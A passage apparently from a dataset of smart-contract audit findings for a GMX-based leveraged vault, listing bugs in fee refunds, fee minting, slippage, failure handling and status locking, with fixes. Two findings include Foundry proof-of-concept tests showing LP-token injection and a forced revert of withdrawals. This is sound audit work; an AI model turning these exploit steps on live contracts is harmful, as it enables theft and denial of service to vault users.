deposit in token decimals\\n uint256 amt;\\n // Minimum amount of shares to receive in 1e18\\n uint256 minSharesAmt;\\n // Slippage tolerance for adding liquidity; e.g. 3 = 0.03%\\n uint256 slippage;\\n // Execution fee sent to GMX for adding liquidity\\n uint256 executionFee;\\n }\\n```\\n\\nThe refund is intended for the message sender (msg.sender), which in the initial deposit case, is the depositor. This is established in the `GMXDeposit.deposit` function, where `self.refundee` is assigned to `msg.sender`.\\n```\\nfunction deposit(GMXTypes.Store storage self, GMXTypes.DepositParams memory dp, bool isNative) external {\\n // Sweep any tokenA/B in vault to the temporary trove for future compouding and to prevent\\n // it from being considered as part of depositor's assets\\n if (self.tokenA.balanceOf(address(this)) > 0) {\\n self.tokenA.safeTransfer(self.trove, self.tokenA.balanceOf(address(this)));\\n }\\n if (self.tokenB.balanceOf(address(this)) > 0) {\\n self.tokenB.safeTransfer(self.trove, self.tokenB.balanceOf(address(this)));\\n }\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n\\n _dc.depositKey = GMXManager.addLiquidity(self, _alp);\\n\\n self.depositCache = _dc;\\n\\n emit DepositCreated(_dc.user, _dc.depositParams.token, _dc.depositParams.amt);\\n }\\n```\\n\\nIf the deposit passes the GMX checks, the `afterDepositExecution` callback is triggered, leading to `vault.processDeposit()` to check the vault's health. A failure here updates the status to `GMXTypes.Status.Deposit_Failed`. The reversal process is then handled by the `processDepositFailure` function, which can only be called by keepers. They pay for the transaction's gas costs, including the execution fee.\\n```\\nfunction processDepositFailure(uint256 slippage, uint256 executionFee) external payable onlyKeeper {\\n GMXDeposit.processDepositFailure(_store, slippage, executionFee);\\n }\\n```\\n\\nIn `GMXDeposit.processDepositFailure`, `self.refundee` is not updated, resulting in any excess execution fees being incorrectly sent to the initial depositor, although the keeper paid for it.\\n```\\nfunction processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // If current LP amount is somehow less or equal to amount before, we do not remove any liquidity\\n if (GMXReader.lpAmt(self) <= self.depositCache.healthParams.lpAmtBefore) {\\n processDepositFailureLiquidityWithdrawal(self);\\n } else {\\n // Remove only the newly added LP amount\\n _rlp.lpAmt = GMXReader.lpAmt(self) - self.depositCache.healthParams.lpAmtBefore;\\n\\n // If delta strategy is Long, remove all in tokenB to make it more\\n // efficent to repay tokenB debt as Long strategy only borrows tokenB\\n if (self.delta == GMXTypes.Delta.Long) {\\n address[] memory _tokenASwapPath = new address[](1);\\n _tokenASwapPath[0] = address(self.lpToken);\\n _rlp.tokenASwapPath = _tokenASwapPath;\\n\\n (_rlp.minTokenAAmt, _rlp.minTokenBAmt) = GMXManager.calcMinTokensSlippageAmt(\\n self, _rlp.lpAmt, address(self.tokenB), address(self.tokenB), slippage\\n );\\n } else {\\n (_rlp.minTokenAAmt, _rlp.minTokenBAmt) = GMXManager.calcMinTokensSlippageAmt(\\n self, _rlp.lpAmt, address(self.tokenA), address(self.tokenB), slippage\\n );\\n }\\n\\n _rlp.executionFee = executionFee;\\n\\n // Remove liqudity\\n self.depositCache.withdrawKey = GMXManager.removeLiquidity(self, _rlp);\\n }\\n```\\n\\nThe same issue occurs in the `processWithdrawFailure` function where the excess fees will be sent to the initial user who called withdraw instead of the keeper.","The `processDepositFailure` and `processWithdrawFailure` functions must be modified to update `self.refundee` to the current executor of the function, which, in the case of deposit or withdraw failure, is the keeper.\\n```\\nfunction processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n }\\n```\\n\\n```\\nfunction processWithdrawFailure(\\n GMXTypes.Store storage self,\\n uint256 slippage,\\n uint256 executionFee\\n ) external {\\n GMXChecks.beforeProcessAfterWithdrawFailureChecks(self);\\n\\n self.refundee = payable(msg.sender);\\n\\n // rest of code\\n }\\n```\\n","This flaw causes a loss of funds for the keepers, negatively impacting the vaults. Users also inadvertently receive extra fees that are rightfully owed to the keepers","```\\nfunction deposit(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, false);\\n }\\n\\nstruct DepositParams {\\n // Address of token depositing; can be tokenA, tokenB or lpToken\\n address token;\\n // Amount of token to deposit in token decimals\\n uint256 amt;\\n // Minimum amount of shares to receive in 1e18\\n uint256 minSharesAmt;\\n // Slippage tolerance for adding liquidity; e.g. 3 = 0.03%\\n uint256 slippage;\\n // Execution fee sent to GMX for adding liquidity\\n uint256 executionFee;\\n }\\n```\\n" +Users withdraw more assets than should when `mintFee` was called long ago,high,"The amount of LP-tokens to withdraw is calculated at the `GMXWithdraw.withdraw` before the `mintFee` function is called. The `mintFee` function increases the `totalSupply` amount. This way users receive more tokens than should be at the current timestamp. The longer the period since the last `mintFee` was called the more excess tokens the user receives.\\nThe protocol mints vault token shares as management fees to protocol treasury with the `mintFee` function. This increases the `totalSupply` of the shares. The amount of minted fees depends on the time since the last `mintFee` call.\\n```\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store));\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n\\nWhile withdrawal amount of LP-token can be calculated with outdated totalSupply:\\n```\\n67 _wc.shareRatio = wp.shareAmt\\n68 * SAFE_MULTIPLIER\\n69 / IERC20(address(self.vault)).totalSupply();\\n70 _wc.lpAmt = _wc.shareRatio\\n71 * GMXReader.lpAmt(self)\\n72 / SAFE_MULTIPLIER;\\n\\n101 self.vault.mintFee();\\n```\\n\\nThe `mintFee` is called only after this calculation.",Users withdraw more assets than should when `mintFee` was called long ago\\nConsider calling the `mintFee` before the `_wc.shareRatio` calculation.,Users can receive excess amounts of tokens during withdrawal. Other users and the protocol management lose value of their shares.\\nTools used\\nManual Review,"```\\n function mintFee() public {\\n _mint(_store.treasury, GMXReader.pendingFee(_store));\\n _store.lastFeeCollected = block.timestamp;\\n }\\n```\\n" +Inaccurate Fee Due to missing lastFeeCollected Update Before feePerSecond Modification,medium,"The protocol charges a management fee based on the `feePerSecond` variable, which dictates the rate at which new vault tokens are minted as fees via the `mintFee` function. An administrative function `updateFeePerSecond` allows the owner to alter this fee rate. However, the current implementation does not account for accrued fees before the update, potentially leading to incorrect fee calculation.\\nThe contract's logic fails to account for outstanding fees at the old rate prior to updating the `feePerSecond`. As it stands, the `updateFeePerSecond` function changes the fee rate without triggering a `mintFee`, which would update the `lastFeeCollected` timestamp and mint the correct amount of fees owed up until that point.\\n```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\n\\nScenario Illustration:\\nUser A deposits, triggering `mintFee` and setting `lastFeeCollected` to the current `block.timestamp`.\\nAfter two hours without transactions, no additional `mintFee` calls occur.\\nThe owner invokes `updateFeePerSecond` to increase the fee by 10%.\\nUser B deposits, and `mintFee` now calculates fees since `lastFeeCollected` using the new, higher rate, incorrectly applying it to the period before the rate change.",Inaccurate Fee Due to missing lastFeeCollected Update Before feePerSecond Modification\\nEnsure the fees are accurately accounted for at their respective rates by updating `lastFeeCollected` to the current timestamp prior to altering the `feePerSecond`. This can be achieved by invoking `mintFee` within the `updateFeePerSecond` function to settle all pending fees first:\\n```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n self.vault.mintFee();\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\n,The impact is twofold:\\nAn increased `feePerSecond` results in excessively high fees charged for the period before the update.\\nA decreased `feePerSecond` leads to lower-than-expected fees for the same duration.,```\\nfunction updateFeePerSecond(uint256 feePerSecond) external onlyOwner {\\n _store.feePerSecond = feePerSecond;\\n emit FeePerSecondUpdated(feePerSecond);\\n }\\n```\\n +Token injection leads to unintended behavior of vault,medium,"When a token is deposited/withdrawn in a vault, it happens in two steps. In the first step, some states of the vault are saved, which are partially important for the second step, and a request to deposit/withdraw is made to GMX. In the second step, GMX calls the callback function, and the vault completes the deposit/withdrawal. The problem is that one can send LP tokens to the contract between these two steps, causing the vault to behave unintentionally.\\nDeposit\\nHere is a PoC for the effects when sending lpTokens between the two steps during deposit:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from ""forge-std/Test.sol"";\\nimport { TestUtils } from ""../../helpers/TestUtils.sol"";\\nimport { IERC20 } from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport { GMXMockVaultSetup } from ""./GMXMockVaultSetup.t.sol"";\\nimport { GMXTypes } from ""../../../contracts/strategy/gmx/GMXTypes.sol"";\\nimport { GMXTestHelper } from ""./GMXTestHelper.sol"";\\n\\nimport { IDeposit } from ""../../../contracts/interfaces/protocols/gmx/IDeposit.sol"";\\nimport { IEvent } from ""../../../contracts/interfaces/protocols/gmx/IEvent.sol"";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC2() public {\\n uint256 lpAmtUser1 = 0.000005e18; //~400$ (because price of lpToken = 79990000$)\\n\\n //In the setup, the owner receives a few lpTokens, which are now sent to user1 for testing the token injection\\n vm.startPrank(owner);\\n IERC20(address(WETHUSDCpair)).transfer(address(user1), lpAmtUser1);\\n vm.stopPrank();\\n \\n //Owner deposits in Vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 0.1 ether, 0, SLIPPAGE, EXECUTION_FEE); //User1 creates deposit. The 0.1 ether is being leveraged\\n IERC20(address(WETHUSDCpair)).transfer(address(vault), lpAmtUser1); //User1 injects lp-tokens between createDeposit and processDeposit. They are not leveraged\\n vm.stopPrank();\\n //In step one, the equity was saved before the deposit. The equity depends on the LP amount and the debts to the lending Vaults. In step two, \\n //the saved equity is used alongside the current equity to calculate how many Vault shares a user receives. This way, user1 receives shares \\n //for their injected tokens that do not have any leverage.(so no borrowing from the lending vaults was done for these tokens)\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //User1 withdraws all his tokens.\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1);\\n vm.startPrank(user1);\\n //In the case of a withdrawal, the debts to the LendingVaults are also repaid. Since it is assumed that all tokens have been leveraged, there \\n //is a mistaken repayment to the lending vaults for the injected tokens as well.\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n \\n //After User1 withdrew their LP tokens, the debt amount for TokenB would normally be approximately the same as it was before User1 deposited. \\n //However, due to the unleveraged tokens, more debt was repaid, resulting in a lower debt and, consequently, lower leverage than before.\\n assert(debtAmtTokenBBefore - 750e6 > debtAmtTokenBAfter); //750e6 == $750. This is to show that the debt is significantly less than before\\n\\n console.log(""debtAmtTokenBBefore: %s"", debtAmtTokenBBefore);\\n console.log(""debtAmtTokenBAfter: %s"", debtAmtTokenBAfter);\\n }\\n}\\n```\\n\\nSince the user can withdraw their injected tokens, which they received VaultShares for, they could execute this action multiple times to further worsen the tokenB debt amount and, consequently, the leverage.\\nThe POC can be started with this command: `forge test --match-test test_POC2 -vv`\\nWithdraw\\nWhen withdrawing, LP tokens can also be injected between the two steps. This can be exploited by an attacker because he can fail the afterWithdrawChecks if he sends the same amount of lp tokens that a user wants to withdraw.\\nHere is the check that the attacker could exploit by sending enough tokens to make the lpAmt as large as it was before the withdrawal:\\n```\\nFile: GMXChecks.sol#afterWithdrawChecks\\nif (GMXReader.lpAmt(self) >= self.withdrawCache.healthParams.lpAmtBefore)\\n revert Errors.InsufficientLPTokensBurned();\\n```\\n","In the deposit function, the depositValue should be used to determine approximately how many lpTokens GMX will be transferred to the vault. This number should then be compared to the actual received amount in processDeposit.\\nIn the case of withdrawal, after calling removeLiquidity, the lpAmt should be stored, and this should be compared to the lpAmt in the processWithdraw function to determine whether tokens were injected.","Since, if this bug is exploited during deposit, an attacker can decrease the leverage, it results in users of the vault having less leverage and lower yield.\\nWhen withdrawing, the attacker can potentially cause the withdrawal to fail, but the user doesn't lose anything and can try again.","```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from ""forge-std/Test.sol"";\\nimport { TestUtils } from ""../../helpers/TestUtils.sol"";\\nimport { IERC20 } from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport { GMXMockVaultSetup } from ""./GMXMockVaultSetup.t.sol"";\\nimport { GMXTypes } from ""../../../contracts/strategy/gmx/GMXTypes.sol"";\\nimport { GMXTestHelper } from ""./GMXTestHelper.sol"";\\n\\nimport { IDeposit } from ""../../../contracts/interfaces/protocols/gmx/IDeposit.sol"";\\nimport { IEvent } from ""../../../contracts/interfaces/protocols/gmx/IEvent.sol"";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC2() public {\\n uint256 lpAmtUser1 = 0.000005e18; //~400$ (because price of lpToken = 79990000$)\\n\\n //In the setup, the owner receives a few lpTokens, which are now sent to user1 for testing the token injection\\n vm.startPrank(owner);\\n IERC20(address(WETHUSDCpair)).transfer(address(user1), lpAmtUser1);\\n vm.stopPrank();\\n \\n //Owner deposits in Vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 0.1 ether, 0, SLIPPAGE, EXECUTION_FEE); //User1 creates deposit. The 0.1 ether is being leveraged\\n IERC20(address(WETHUSDCpair)).transfer(address(vault), lpAmtUser1); //User1 injects lp-tokens between createDeposit and processDeposit. They are not leveraged\\n vm.stopPrank();\\n //In step one, the equity was saved before the deposit. The equity depends on the LP amount and the debts to the lending Vaults. In step two, \\n //the saved equity is used alongside the current equity to calculate how many Vault shares a user receives. This way, user1 receives shares \\n //for their injected tokens that do not have any leverage.(so no borrowing from the lending vaults was done for these tokens)\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //User1 withdraws all his tokens.\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1);\\n vm.startPrank(user1);\\n //In the case of a withdrawal, the debts to the LendingVaults are also repaid. Since it is assumed that all tokens have been leveraged, there \\n //is a mistaken repayment to the lending vaults for the injected tokens as well.\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //Variable for Assertion\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n \\n //After User1 withdrew their LP tokens, the debt amount for TokenB would normally be approximately the same as it was before User1 deposited. \\n //However, due to the unleveraged tokens, more debt was repaid, resulting in a lower debt and, consequently, lower leverage than before.\\n assert(debtAmtTokenBBefore - 750e6 > debtAmtTokenBAfter); //750e6 == $750. This is to show that the debt is significantly less than before\\n\\n console.log(""debtAmtTokenBBefore: %s"", debtAmtTokenBBefore);\\n console.log(""debtAmtTokenBAfter: %s"", debtAmtTokenBAfter);\\n }\\n}\\n```\\n" +User can revert processWithdraw,high,"When a user wants to withdraw his tokens after depositing, the LP tokens are first sent to GMX. GMX then sends back the deposited tokens. Before the user receives them, their Vault Shares are burned in processWithdraw:\\n```\\nFile: GMXWithdraw.sol#processWithdraw\\nself.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n\\nA user could, after the LP tokens have been transferred to GMX and the Vault is waiting for the callback, transfer his Vault Shares away from his address. This would result in not having enough tokens left during the burn, causing a revert. Afterward, the Vault would be stuck in the 'Withdraw' state because, although the keeper could call the function again, it would result in revert again.\\nHere is a POC that demonstrates how a user can cause the processWithdraw to revert:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from ""forge-std/Test.sol"";\\nimport { TestUtils } from ""../../helpers/TestUtils.sol"";\\nimport { IERC20 } from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\nimport { IERC20Errors } from ""@openzeppelin/contracts/interfaces/draft-IERC6093.sol"";\\nimport { GMXMockVaultSetup } from ""./GMXMockVaultSetup.t.sol"";\\nimport { GMXTypes } from ""../../../contracts/strategy/gmx/GMXTypes.sol"";\\nimport { GMXTestHelper } from ""./GMXTestHelper.sol"";\\n\\nimport { IDeposit } from ""../../../contracts/interfaces/protocols/gmx/IDeposit.sol"";\\nimport { IEvent } from ""../../../contracts/interfaces/protocols/gmx/IEvent.sol"";\\nimport { Attacker } from ""./Attacker.sol"";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC4() public {\\n //owner deposits\\n vm.startPrank(address(owner));\\n _createAndExecuteDeposit(address(WETH), address(USDC), address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n //user1 deposits\\n vm.startPrank(address(user1));\\n _createAndExecuteDeposit(address(WETH), address(USDC), address(WETH), 10 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n \\n uint256 vaultSharesAmt = IERC20(address(vault)).balanceOf(address(user1)); //Vault Shares from user1 to withdraw\\n vm.startPrank(address(user1));\\n _createWithdrawal(address(USDC), vaultSharesAmt, 0, SLIPPAGE, EXECUTION_FEE); //User 1 creates a withdrawal\\n IERC20(address(vault)).transfer(address(user2), vaultSharesAmt); //Before processWithdraw is executed and the user's Vault Shares are burned, he sends them away\\n\\n vm.expectRevert(\\n abi.encodeWithSelector(IERC20Errors.ERC20InsufficientBalance.selector, address(user1), 0, vaultSharesAmt)\\n );\\n mockExchangeRouter.executeWithdrawal(address(WETH), address(USDC), address(vault), address(callback)); //executeWithdraw reverted as there are no tokens to burn\\n vm.stopPrank();\\n\\n GMXTypes.Store memory _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw)); //shows that the vault is still in the Withdraw status\\n }\\n}\\n```\\n\\nThe POC can be started with this command: `forge test --match-test test_POC4 -vv`","Tokens should be burned immediately after remove liquidity is called in GMXWithdraw.sol:\\n```\\n// Add the line below\\n 154: self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n// Remove the line below\\n 197: self.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n","A user could put the Vault into a 'Stuck' state that can only be exited through 'emergencyPause' and 'emergencyResume.' This would take some time as 'emergencyResume' can only be called by the owner, who is a Multisig with a Timelock. (A keeper could also call 'processWithdrawCancellation,' but in this case, the debt to the lending vault would not be repaid. The tokens withdrawn by GMX would simply remain in the vault, and the user's Vault Shares would not be burned.)","```\\nFile: GMXWithdraw.sol#processWithdraw\\nself.vault.burn(self.withdrawCache.user, self.withdrawCache.withdrawParams.shareAmt);\\n```\\n" +Incorrect slippage protection on deposits,high,"The slippage on deposits is enforced by the `minMarketTokenAmt` parameter. But in the calculation of `minMarketTokenAmt`, the slippage is factored on the user's deposit value and not the leveraged amount which is actually being deposited to GMX.\\n```\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n \\n // rest of code// rest of code. more code \\n\\n if (dp.token == address(self.lpToken)) {\\n // If LP token deposited\\n _dc.depositValue = self.gmxOracle.getLpTokenValue(\\n address(self.lpToken),\\n address(self.tokenA),\\n address(self.tokenA),\\n address(self.tokenB),\\n false,\\n false\\n )\\n * dp.amt\\n / SAFE_MULTIPLIER;\\n } else {\\n // If tokenA or tokenB deposited\\n _dc.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(dp.token),\\n dp.amt\\n );\\n }\\n \\n // rest of code// rest of code. more code\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n _dc.depositValue,\\n dp.slippage\\n );\\n _alp.executionFee = dp.executionFee;\\n\\n\\n _dc.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n```\\n\\nhttps://github.com/Cyfrin/2023-10-SteadeFi/blob/0f909e2f0917cb9ad02986f631d622376510abec/contracts/strategy/gmx/GMXDeposit.sol#L54-L146\\nBut vaults with leverage greater than 1 will be adding more than `_dc.depositValue` worth of liquidity in which case the calculated `minMarketTokenAmt` will result in a much higher slippage.\\nExample Scenario\\nThe vault is a 3x leveraged vault\\nUser deposits 1 usd worth tokenA and sets slippage to 1%.\\nThe `minMarketTokenAmt` calculated is worth 0.99 usd\\nThe actual deposit added is worth 3 usd due to leverage\\nThe deposit receives 2.90 worth of LP token which is more than 1% slippage","Use the actual deposit value instead of the user's initial deposit value when calculating the `minMarketTokenAmt`\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/strategy/gmx/GMXDeposit.sol b/contracts/strategy/gmx/GMXDeposit.sol\\nindex 1b28c3b..aeba68b 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/strategy/gmx/GMXDeposit.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/strategy/gmx/GMXDeposit.sol\\n@@ // Remove the line below\\n135,7 // Add the line below\\n135,15 @@ library GMXDeposit {\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n// Remove the line below\\n _dc.depositValue,\\n// Add the line below\\n GMXReader.convertToUsdValue(\\n// Add the line below\\n self,\\n// Add the line below\\n address(self.tokenA),\\n// Add the line below\\n _alp.tokenAAmt\\n// Add the line below\\n ) // Add the line below\\n GMXReader.convertToUsdValue(\\n// Add the line below\\n self,\\n// Add the line below\\n address(self.tokenB),\\n// Add the line below\\n _alp.tokenBAmt\\n// Add the line below\\n ),\\n dp.slippage\\n );\\n _alp.executionFee = dp.executionFee;\\n```\\n",Depositors can loose value,"```\\n function deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n ) external {\\n \\n // rest of code// rest of code. more code \\n\\n if (dp.token == address(self.lpToken)) {\\n // If LP token deposited\\n _dc.depositValue = self.gmxOracle.getLpTokenValue(\\n address(self.lpToken),\\n address(self.tokenA),\\n address(self.tokenA),\\n address(self.tokenB),\\n false,\\n false\\n )\\n * dp.amt\\n / SAFE_MULTIPLIER;\\n } else {\\n // If tokenA or tokenB deposited\\n _dc.depositValue = GMXReader.convertToUsdValue(\\n self,\\n address(dp.token),\\n dp.amt\\n );\\n }\\n \\n // rest of code// rest of code. more code\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.minMarketTokenAmt = GMXManager.calcMinMarketSlippageAmt(\\n self,\\n _dc.depositValue,\\n dp.slippage\\n );\\n _alp.executionFee = dp.executionFee;\\n\\n\\n _dc.depositKey = GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n```\\n" +incorrect handling for deposit failure leads to stuck at `deposit_failed` status .,medium,"When a deposit fails, the contract can become stuck in a `deposit_failed` status due to improper handling of debt repayment by swapping through the `swapTokensForExactTokens()` function.which leads to gas losses for keeper attempting to handle that and puts user deposits at risk.\\nIn case of a user making a deposit to the `strategy`, it will create a deposit in `GMX`. After a successful deposit, `GMX` will call the callback function `afterDepositExecution`, and the callback function will call `processDeposit`.\\nIf the `processDeposit()` fails in the `try` call for any reason, the function will `catch` that and set the status to `deposit_failed`. An event will be emitted so the keeper can handle it.\\n```\\n function processDeposit(GMXTypes.Store storage self) external {\\n // some code ..\\n try GMXProcessDeposit.processDeposit(self) {\\n // ..more code\\n } catch (bytes memory reason) {\\n self.status = GMXTypes.Status.Deposit_Failed;\\n\\n emit DepositFailed(reason);\\n }\\n }\\n```\\n\\nThe keeper calls the function processDepositFailure(). This function initiates a `requestWithdraw` to `GMX` to remove the liquidity added by the user deposit (+ the borrowed amount).\\nAfter executing the `removeLiquidity`, the callback function `afterWithdrawalExecution` is triggered. and since the status is `deposit_failed`, it invokes the function `processDepositFailureLiquidityWithdrawal`.\\nIn `processDepositFailureLiquidityWithdrawal`, it first checks if a swap is necessary. If required, it swaps tokens to repay the debt.\\n```\\n (bool _swapNeeded, address _tokenFrom, address _tokenTo, uint256 _tokenToAmt) =\\n GMXManager.calcSwapForRepay(self, _rp);\\n\\n if (_swapNeeded) {\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = _tokenFrom;\\n _sp.tokenOut = _tokenTo;\\n _sp.amountIn = IERC20(_tokenFrom).balanceOf(address(this));\\n _sp.amountOut = _tokenToAmt;\\n _sp.slippage = self.minSlippage;\\n _sp.deadline = block.timestamp;\\n GMXManager.swapTokensForExactTokens(self, _sp);\\n }\\n```\\n\\nThe problem arises if the swap revert if the `tokenIn` balance is insufficient to cover the `_amountOut` of `_tokenOut`, leading to a failed swap since the swap function is `swapTokensForExactTokens`. Consequently, the status remains `deposit_failed` and the callback revet.\\nNote: The swap can fail for various reasons.\\nIn this scenario, the keeper can only invoke the `processDepositFailure()` function again. During the second call, it directly triggers `processDepositFailureLiquidityWithdrawal` since the `lp` tokens for the failed deposit has already been withdrawn.\\n```\\n function processDepositFailure(GMXTypes.Store storage self, uint256 slippage, uint256 executionFee) external {\\n GMXChecks.beforeProcessAfterDepositFailureChecks(self);\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n // If current gmx LP amount is somehow less or equal to amount before, we do not remove any liquidity\\n if (GMXReader.lpAmt(self) <= self.depositCache.healthParams.lpAmtBefore) {\\n processDepositFailureLiquidityWithdrawal(self);\\n //// rest of code more code\\n }}\\n```\\n\\nThe swap will always revert because the contract's balance of `tokenIn` will never be sufficient to cover the `_amountOut` of `_tokenOut`. Consequently, the status remains stuck at `deposit_failed`.","Utilize `swapExactTokensForTokens` and swap the remaining tokens from `tokenIn` after substracting debt need to be repaid of this token.for `tokenOut`.\\nImplement safeguards to calculate the appropriate amount for swapping, avoiding potential reverting transactions. Here's an example of how to calculate the swap amount:\\n` if (rp.repayTokenAAmt > self.tokenA.balanceOf(address(this))) {\\n // If more tokenA is needed for repayment\\n if(rp.repayTokenBAmt < self.tokenB.balanceOf(address(this))){\\n _tokenToAmt = self.tokenB.balanceOf(address(this)) - rp.repayTokenBAmt;\\n _tokenFrom = address(self.tokenB);\\n _tokenTo = address(self.tokenA);\\n }\\n }`","The strategy remains stuck at the `deposit_failed` status, halting any further interactions with the protocol.\\nKeepers lose gas for each call to `processDepositFailure()`.\\nUsers may lose their deposits.",```\\n function processDeposit(GMXTypes.Store storage self) external {\\n // some code ..\\n try GMXProcessDeposit.processDeposit(self) {\\n // ..more code\\n } catch (bytes memory reason) {\\n self.status = GMXTypes.Status.Deposit_Failed;\\n\\n emit DepositFailed(reason);\\n }\\n }\\n```\\n +Missing fees allow cheap griefing attacks that lead to DoS,medium,"The protocol has chosen a design pattern which does not allow two users at the same time to interact with the system as every time a user deposits or withdraws funds a 2-step process begins which interacts with GMX and only after this process is closed, another user is allowed to start a new process. This design pattern can be abused as griefing attack by front running all user calls with a small deposit, or withdraw call, to DoS the user's call. As the protocol is deployed on L2 blockchains with low transaction fees and does not take fees on depositing or withdrawing funds, this DoS griefing attack is cheap and can be scaled to a point where nobody is able to interact with the system.\\nThe design pattern of the system which leads to this possibility is the status variable.\\nThe flow for such a griefing attack would look like the following:\\nThe system's status is Open\\nUser wants to deposit or withdraw and creates a transaction to do so\\nAttacker front runs the call of the user and deposit or withdraw a small amount of funds (Systems status changes to Deposit or Withdraw)\\nUser's call gets reverted as the check if the system's status is Open reverts\\nDeposit function calls beforeDepositChecks and updates the status to Deposit:\\n```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // rest of code\\n GMXChecks.beforeDepositChecks(self, _dc.depositValue);\\n\\n self.status = GMXTypes.Status.Deposit;\\n // rest of code\\n}\\n```\\n\\nThe beforeDepositChecks function reverts if the current status is not Open:\\n```\\nfunction beforeDepositChecks(\\n GMXTypes.Store storage self,\\n uint256 depositValue\\n) external view {\\n if (self.status != GMXTypes.Status.Open)\\n revert Errors.NotAllowedInCurrentVaultStatus();\\n // rest of code\\n}\\n```\\n\\nThe same pattern is implemented in the withdraw flow.","Implement fees, for depositing and withdrawing, to increase the costs of such a griefing attack, or rethink the status architecture.",DoS of the whole system for all depositors.,"```\\nfunction deposit(\\n GMXTypes.Store storage self,\\n GMXTypes.DepositParams memory dp,\\n bool isNative\\n) external {\\n // rest of code\\n GMXChecks.beforeDepositChecks(self, _dc.depositValue);\\n\\n self.status = GMXTypes.Status.Deposit;\\n // rest of code\\n}\\n```\\n" +Yield in trove is lost when closing a strategy vault,high,"The funds in the trove contract are not claimed during the emergency close flow and can not be claimed in a 